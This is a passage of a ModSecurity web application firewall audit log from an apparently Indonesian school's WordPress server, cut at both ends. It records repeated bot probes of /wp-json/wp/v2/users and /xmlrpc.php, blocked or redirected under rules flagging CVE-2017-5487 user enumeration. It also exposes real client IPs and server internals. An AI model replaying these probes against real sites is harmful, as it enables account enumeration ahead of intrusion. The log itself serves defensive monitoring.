3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747506093729591 5274 (- - -) Stopwatch2: 1747506093729591 5274; combined=3885, p1=470, p2=3182, p3=35, p4=29, p5=98, sr=60, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01a63213-Z-- --00918667-A-- [18/May/2025:01:22:00 +0700] aCjTyBKi5m5upc8uMd4KMQAAAMU 103.236.140.4 52446 103.236.140.4 8181 --00918667-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --00918667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00918667-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747506120548359 2322 (- - -) Stopwatch2: 1747506120548359 2322; combined=949, p1=329, p2=599, p3=0, p4=0, p5=21, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00918667-Z-- --a627e950-A-- [18/May/2025:01:22:08 +0700] aCjT0Om4kjNN-hEbWjJ8bwAAAFc 103.236.140.4 53040 103.236.140.4 8181 --a627e950-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.42 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a627e950-C-- demo.sayHello --a627e950-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a627e950-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747506128220191 31390 (- - -) Stopwatch2: 1747506128220191 31390; combined=5942, p1=1197, p2=4427, p3=46, p4=63, p5=120, sr=87, sw=89, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a627e950-Z-- --514d3c6d-A-- [18/May/2025:01:23:27 +0700] aCjUH-m4kjNN-hEbWjJ-0QAAAEU 103.236.140.4 59032 103.236.140.4 8181 --514d3c6d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.52 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --514d3c6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --514d3c6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747506207211876 18931 (- - -) Stopwatch2: 1747506207211876 18931; combined=4620, p1=3374, p2=1218, p3=0, p4=0, p5=28, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --514d3c6d-Z-- --d3ea9b39-A-- [18/May/2025:01:23:35 +0700] aCjUJxKi5m5upc8uMd4MuAAAAMQ 103.236.140.4 59684 103.236.140.4 8181 --d3ea9b39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.52 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3ea9b39-C-- demo.sayHello --d3ea9b39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3ea9b39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747506215500299 6705 (- - -) Stopwatch2: 1747506215500299 6705; combined=4764, p1=625, p2=3892, p3=33, p4=37, p5=103, sr=74, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3ea9b39-Z-- --3dfc5c55-A-- [18/May/2025:01:23:52 +0700] aCjUOHyxdQCiyU1ENFd8gwAAABU 103.236.140.4 32786 103.236.140.4 8181 --3dfc5c55-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3dfc5c55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3dfc5c55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747506232834596 2581 (- - -) Stopwatch2: 1747506232834596 2581; combined=1581, p1=482, p2=1072, p3=0, p4=0, p5=27, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3dfc5c55-Z-- --98d37423-A-- [18/May/2025:01:24:00 +0700] aCjUQBKi5m5upc8uMd4NggAAAMo 103.236.140.4 33332 103.236.140.4 8181 --98d37423-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.1 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --98d37423-C-- demo.sayHello --98d37423-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --98d37423-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747506240634780 6113 (- - -) Stopwatch2: 1747506240634780 6113; combined=4674, p1=625, p2=3802, p3=43, p4=42, p5=97, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98d37423-Z-- --d06c2758-A-- [18/May/2025:01:26:08 +0700] aCjUwBKi5m5upc8uMd4Q7gAAAMo 103.236.140.4 42232 103.236.140.4 8181 --d06c2758-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d06c2758-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d06c2758-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747506368304454 2321 (- - -) Stopwatch2: 1747506368304454 2321; combined=967, p1=330, p2=615, p3=0, p4=0, p5=22, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d06c2758-Z-- --238aba39-A-- [18/May/2025:01:26:16 +0700] aCjUyATOsBn9MSWb6WK8YgAAAJY 103.236.140.4 42874 103.236.140.4 8181 --238aba39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --238aba39-C-- demo.sayHello --238aba39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --238aba39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747506376234238 5624 (- - -) Stopwatch2: 1747506376234238 5624; combined=4189, p1=560, p2=3407, p3=32, p4=34, p5=92, sr=81, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --238aba39-Z-- --43b80610-A-- [18/May/2025:01:26:34 +0700] aCjU2hKi5m5upc8uMd4RyQAAAMM 103.236.140.4 44298 103.236.140.4 8181 --43b80610-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --43b80610-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43b80610-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747506394996671 2853 (- - -) Stopwatch2: 1747506394996671 2853; combined=1453, p1=437, p2=990, p3=0, p4=0, p5=26, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43b80610-Z-- --0730cb53-A-- [18/May/2025:01:26:44 +0700] aCjU5ATOsBn9MSWb6WK9NAAAAJA 103.236.140.4 45036 103.236.140.4 8181 --0730cb53-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0730cb53-C-- demo.sayHello --0730cb53-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0730cb53-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747506404690012 4710 (- - -) Stopwatch2: 1747506404690012 4710; combined=3379, p1=471, p2=2717, p3=30, p4=34, p5=75, sr=70, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0730cb53-Z-- --f982151e-A-- [18/May/2025:01:37:25 +0700] aCjXZRKi5m5upc8uMd4mCgAAAMo 103.236.140.4 37564 103.236.140.4 8181 --f982151e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f982151e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f982151e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507045364437 2649 (- - -) Stopwatch2: 1747507045364437 2649; combined=1204, p1=394, p2=778, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f982151e-Z-- --dff30f6f-A-- [18/May/2025:01:37:30 +0700] aCjXagTOsBn9MSWb6WLPhwAAAIo 103.236.140.4 37958 103.236.140.4 8181 --dff30f6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dff30f6f-C-- demo.sayHello --dff30f6f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dff30f6f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507050361405 6189 (- - -) Stopwatch2: 1747507050361405 6189; combined=4743, p1=637, p2=3821, p3=46, p4=61, p5=109, sr=63, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dff30f6f-Z-- --41dee109-A-- [18/May/2025:01:39:11 +0700] aCjXzxKi5m5upc8uMd4pEAAAAMU 103.236.140.4 45410 103.236.140.4 8181 --41dee109-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --41dee109-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41dee109-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507151415443 2722 (- - -) Stopwatch2: 1747507151415443 2722; combined=1387, p1=420, p2=944, p3=0, p4=0, p5=23, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41dee109-Z-- --0df02734-A-- [18/May/2025:01:39:17 +0700] aCjX1RKi5m5upc8uMd4pQQAAAMI 103.236.140.4 45834 103.236.140.4 8181 --0df02734-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0df02734-C-- demo.sayHello --0df02734-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0df02734-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507157242218 5968 (- - -) Stopwatch2: 1747507157242218 5968; combined=4790, p1=531, p2=3987, p3=56, p4=66, p5=89, sr=68, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0df02734-Z-- --53aa4053-A-- [18/May/2025:01:41:52 +0700] aCjYcHyxdQCiyU1ENFeZqgAAAAA 103.236.140.4 57542 103.236.140.4 8181 --53aa4053-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --53aa4053-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53aa4053-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507312250037 2413 (- - -) Stopwatch2: 1747507312250037 2413; combined=1025, p1=362, p2=637, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53aa4053-Z-- --6c6cfa40-A-- [18/May/2025:01:42:00 +0700] aCjYeBKi5m5upc8uMd4tzwAAANg 103.236.140.4 58250 103.236.140.4 8181 --6c6cfa40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c6cfa40-C-- demo.sayHello --6c6cfa40-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c6cfa40-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507320448888 4413 (- - -) Stopwatch2: 1747507320448888 4413; combined=3353, p1=423, p2=2701, p3=29, p4=30, p5=97, sr=52, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c6cfa40-Z-- --a998eb28-A-- [18/May/2025:01:43:01 +0700] aCjYtQTOsBn9MSWb6WLY_QAAAIY 103.236.140.4 34216 103.236.140.4 8181 --a998eb28-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a998eb28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a998eb28-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 